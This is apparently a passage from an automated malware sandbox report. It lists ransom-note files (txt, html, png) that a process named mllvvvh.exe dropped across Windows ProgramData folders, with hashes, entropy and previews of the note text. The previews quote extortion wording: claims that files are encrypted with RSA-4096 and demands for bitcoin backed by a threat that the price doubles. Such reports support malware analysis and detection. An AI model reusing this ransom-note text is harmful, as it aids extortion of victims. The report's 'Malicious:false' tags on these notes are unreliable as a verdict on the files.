                  SHA-512:FF5109BDF2D8C4C755687F560BADBED3DEF165EDFB8B9C43C9DAB6059756C1D9FDC2C5405BBC759E14BAF1B76C5E5ABE2203CF48973F9AFB9849B20FA996FBA9
                  Malicious:false
                  C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):18873
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5u
                  MD5:ADC60E08450FC05F8E5AAAA3EB29750B
                  SHA1:3C6E978C14B69A4B4BCFA3D3996FB9A212AF25EC
                  SHA-256:A4C281C75F49278501AC118F0F51A6A296FFEEB9492DFD5B7572505734000BA0
                  SHA-512:ED9BC8B77C3A7345E13B1043C18A9287F6ABFCFD730ADA5EF0624DA8DFFC51C6BACD1709D5F7257959E6B754A0F8700A537D00DE5FEB1B76CDAACF6535A384F9
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Adobe\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Adobe\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):745272
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCU
                  MD5:38643A69A593611938C85BAF3337DA1B
                  SHA1:E8D9129D250AA084F4E9306B61445CF8B32BFA6C
                  SHA-256:BFE9D7F5AD7AC28E231D4E8F4FC4B7E06DF77EBB2D37340A2EDBF787383122DD
                  SHA-512:FC9C588F680CF48F740B6A78B0229B3240DCBA58474C6FD15576A28A182A5490DDF54C2B49CBE40DA4645F2A35396CF312A7B7BE7C60E1AD97135837D0F1B624
                  Malicious:false
                  C:\ProgramData\Adobe\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23067
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6F9EA1B719E526F11C182ACABF81BA36
                  SHA1:98A7C8C498E97259214638D80FBB5B7ACDC760BC
                  SHA-256:387BBB93DF73D3BAE44280C20D7CC23DB145F987185E92C811F2B8BB9A4A4F71
                  SHA-512:95018868B921382E2C6BFA1E5650612A5BA7E69923B6E36CFE373857AF66DB4D872E98E4E5AC1CF9690D84E1B6F458DC5E891DFA11DBD6984A32813E8FC0E21A
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft Help\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft Help\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft Help\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft OneDrive\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft OneDrive\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft OneDrive\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft OneDrive\setup\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft OneDrive\setup\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft OneDrive\setup\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\AppV\Setup\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\AppV\Setup\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\AppV\Setup\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\AppV\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):70704
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkL
                  MD5:60B3A4062ABE3EA49E6EB8911977B25E
                  SHA1:E046E8388CABEAA51B3E3FF27CE6434F2A6A0562
                  SHA-256:CFF09453B6ECB0B0E2D0852C1615A4AB6074BC5AD97C38EDC31EA82A7EF58740
                  SHA-512:90F7D4F8735F24BE3FF2CE49412BE3E2497C02A3C45D1143DEF24F1B5E8A9C03F1BFAD028ACD58403725BFB98113B65C43E5EDDCF4681F0F8B3656924579CEF5
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\AppV\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):609768
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCc
                  MD5:E8D2A8D45AE6681B32BED0C71800A1EA
                  SHA1:AB33C23D6A69B473CA0E6A40D194BA7AE5ACB066
                  SHA-256:CCF4C9E7968DA09FABC49BCDBAB494296C5AE1508FD69DF675C1C880D2BE8FFD
                  SHA-512:FF5109BDF2D8C4C755687F560BADBED3DEF165EDFB8B9C43C9DAB6059756C1D9FDC2C5405BBC759E14BAF1B76C5E5ABE2203CF48973F9AFB9849B20FA996FBA9
                  Malicious:false
                  C:\ProgramData\Microsoft\AppV\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):18873
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5u
                  MD5:ADC60E08450FC05F8E5AAAA3EB29750B
                  SHA1:3C6E978C14B69A4B4BCFA3D3996FB9A212AF25EC
                  SHA-256:A4C281C75F49278501AC118F0F51A6A296FFEEB9492DFD5B7572505734000BA0
                  SHA-512:ED9BC8B77C3A7345E13B1043C18A9287F6ABFCFD730ADA5EF0624DA8DFFC51C6BACD1709D5F7257959E6B754A0F8700A537D00DE5FEB1B76CDAACF6535A384F9
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Crypto\DSS\MachineKeys\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Crypto\DSS\MachineKeys\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Crypto\DSS\MachineKeys\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
